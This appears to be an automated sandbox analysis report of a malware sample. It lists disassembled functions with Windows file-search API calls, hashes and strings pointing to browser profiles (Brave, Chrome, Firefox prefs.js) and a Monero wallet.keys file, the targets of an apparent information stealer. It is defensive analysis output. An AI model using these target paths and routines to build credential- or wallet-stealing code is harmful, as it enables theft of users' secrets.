                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 721584d7369d7d44194affdbc1daf271ed3a6c7f441d0963486cffbd8cdb2419
                                  • Instruction ID: a75f362a59c0ef45af7ba3fe7bc161d762b284883e1642ffef108d928fc9e784
                                  • Opcode Fuzzy Hash: 721584d7369d7d44194affdbc1daf271ed3a6c7f441d0963486cffbd8cdb2419
                                  • Instruction Fuzzy Hash: A6424272D10108ABDB14FB74DD96EFD73BCAB94300F4045D8B50AA6191EE74AF49CBA2
                                  Function 00BB4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB4943
                                  • StrCmpCA.SHLWAPI(?,00BC0FDC), ref: 00BB4971
                                  • StrCmpCA.SHLWAPI(?,00BC0FE0), ref: 00BB4987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00BB4B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 79a896fd431301a114d02bb661c8cbdc0b350b65b32b6d28b78fce2b9c135947
                                  • Instruction ID: 7f590789e9ddacd3a402b80b3e78ac33b97a45cdb95368f676178dbab392b590
                                  • Opcode Fuzzy Hash: 79a896fd431301a114d02bb661c8cbdc0b350b65b32b6d28b78fce2b9c135947
                                  • Instruction Fuzzy Hash: AD6131B1910219ABCB20FBA4DC85FFA73BCBB58700F0445CCB649D6141EB71AB858FA1
                                  Function 00BB4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB4580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB4587
                                  • wsprintfA.USER32 ref: 00BB45A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB45BD
                                  • StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB45EB
                                  • StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB468B
                                  • FindClose.KERNEL32(000000FF), ref: 00BB46A0
                                  • lstrcat.KERNEL32(?,01410FA0), ref: 00BB46C5
                                  • lstrcat.KERNEL32(?,0140F918), ref: 00BB46D8
                                  • lstrlen.KERNEL32(?), ref: 00BB46E5
                                  • lstrlen.KERNEL32(?), ref: 00BB46F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 60061187ddb9dbf8feedeac32f03547fbea05f69d67ffd76e33e83be092a2e24
                                  • Instruction ID: 3547a82913d4b05aad15f9127cd2b79878fb864b4a19506c4938f33fe79fbbac
                                  • Opcode Fuzzy Hash: 60061187ddb9dbf8feedeac32f03547fbea05f69d67ffd76e33e83be092a2e24
                                  • Instruction Fuzzy Hash: 6A5143B59102199BCB24FB74DCC9FED77BCAB54300F4045C8B649D6151EB74AA848FA2
                                  Function 00BB3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB3EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB3EDA
                                  • StrCmpCA.SHLWAPI(?,00BC0FAC), ref: 00BB3F08
                                  • StrCmpCA.SHLWAPI(?,00BC0FB0), ref: 00BB3F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB406C
                                  • FindClose.KERNEL32(000000FF), ref: 00BB4081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 7b9565193b08ce0914fa7e2c5d179e4f9b71384527e59e2be1912eef58665c3f
                                  • Instruction ID: 1b5357c20e1a62d8d54dff7db87d7f0c27f1e0d3630cc839d5019259eddd3a67
                                  • Opcode Fuzzy Hash: 7b9565193b08ce0914fa7e2c5d179e4f9b71384527e59e2be1912eef58665c3f
                                  • Instruction Fuzzy Hash: 0F5132B6900219ABCB24FBA4DCC5EFA73BCBB54700F4045C8B65996140DB75AB858FA1
                                  Function 00BAED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BAED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BAED55
                                  • StrCmpCA.SHLWAPI(?,00BC1538), ref: 00BAEDAB
                                  • StrCmpCA.SHLWAPI(?,00BC153C), ref: 00BAEDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAF2AE
                                  • FindClose.KERNEL32(000000FF), ref: 00BAF2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 05531193d52bf4fea1630e6dc7aa450b6b123e6ce5b8b34cbb78328548237360
                                  • Instruction ID: 38bb76c5faed73a222c6166a518df50d2339e64ba016f66950824894414b6827
                                  • Opcode Fuzzy Hash: 05531193d52bf4fea1630e6dc7aa450b6b123e6ce5b8b34cbb78328548237360
                                  • Instruction Fuzzy Hash: 92E1D371D11118ABEB64FB64CC92EFE73B8AF54300F4045D9B50A62492EE706F8ACF61
                                  Function 00BAF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC15B8,00BC0D96), ref: 00BAF71E
                                  • StrCmpCA.SHLWAPI(?,00BC15BC), ref: 00BAF76F
                                  • StrCmpCA.SHLWAPI(?,00BC15C0), ref: 00BAF785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAFAB1
                                  • FindClose.KERNEL32(000000FF), ref: 00BAFAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: cd8ead02a9625645b165289029504b6b0d49e85e65a2dc3ec69d0293a0247d95
                                  • Instruction ID: aedb091b5467d01207c1d9f55a98321b15df17a3da745e4e039b95c8faaa7855
                                  • Opcode Fuzzy Hash: cd8ead02a9625645b165289029504b6b0d49e85e65a2dc3ec69d0293a0247d95
                                  • Instruction Fuzzy Hash: 1EB11371D00219AFDB24FF64DC95EFE73B9AF55300F4085E8A40AA6191EF706B49CB92
                                  Function 00BA16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC510C,?,?,?,00BC51B4,?,?,00000000,?,00000000), ref: 00BA1923
                                  • StrCmpCA.SHLWAPI(?,00BC525C), ref: 00BA1973
                                  • StrCmpCA.SHLWAPI(?,00BC5304), ref: 00BA1989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BA1D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA1DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BA1E20
                                  • FindClose.KERNEL32(000000FF), ref: 00BA1E32
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: ffe1b7e9a110f0aa1350027476f8ab25140044126876ab55dc64f75d0570edca
                                  • Instruction ID: 2f2284763736855424ce8f823b401969ad1fd305134ff2ddb27862c6fb49eca7
                                  • Opcode Fuzzy Hash: ffe1b7e9a110f0aa1350027476f8ab25140044126876ab55dc64f75d0570edca
                                  • Instruction Fuzzy Hash: 0512CD71D10118ABDB25FB60CCA6EFE73B8AF54300F4045D9A54A66491EFB06F89CFA1
                                  Function 00BADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BC0C2E), ref: 00BADE5E
                                  • StrCmpCA.SHLWAPI(?,00BC14C8), ref: 00BADEAE
                                  • StrCmpCA.SHLWAPI(?,00BC14CC), ref: 00BADEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAE3E0
                                  • FindClose.KERNEL32(000000FF), ref: 00BAE3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: a581513d8967b66c307e55b2aa2147cb18921fb38e1381bca9cff9c6cd9cfb33
                                  • Instruction ID: a691fecb28ff295e1aa7ca422c23cb682843eff3bcf5cca84e3603ca93492fa3
                                  • Opcode Fuzzy Hash: a581513d8967b66c307e55b2aa2147cb18921fb38e1381bca9cff9c6cd9cfb33
                                  • Instruction Fuzzy Hash: 26F18E71C14118ABDB25FB64CCA5EFE73B8AF54300F8045D9A45A72491EF706F8ACE61
                                  Function 00F71E83 Relevance: 14.2, Strings: 10, Instructions: 1664COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !2}w$%[{$(G_o$:n]o$<8~}$Qx?$h;$W]$`_$]{
                                  • API String ID: 0-775019265
                                  • Opcode ID: 567350fbd2cf58c6a7d5c652231e11edbe820cc580c210134f14dbb3a255abf9
                                  • Instruction ID: 066622ab1bdb121a185d9cba2b54cc020b33ba70185e7152223b9fdd4b04c9a2
                                  • Opcode Fuzzy Hash: 567350fbd2cf58c6a7d5c652231e11edbe820cc580c210134f14dbb3a255abf9
                                  • Instruction Fuzzy Hash: 3DB22CF3A0C2049FE308AE2DEC8567AB7E6EBD4720F16863DE6C5C3744E93558058657
                                  Function 00BADA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC14B0,00BC0C2A), ref: 00BADAEB
                                  • StrCmpCA.SHLWAPI(?,00BC14B4), ref: 00BADB33
                                  • StrCmpCA.SHLWAPI(?,00BC14B8), ref: 00BADB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BADDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00BADDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
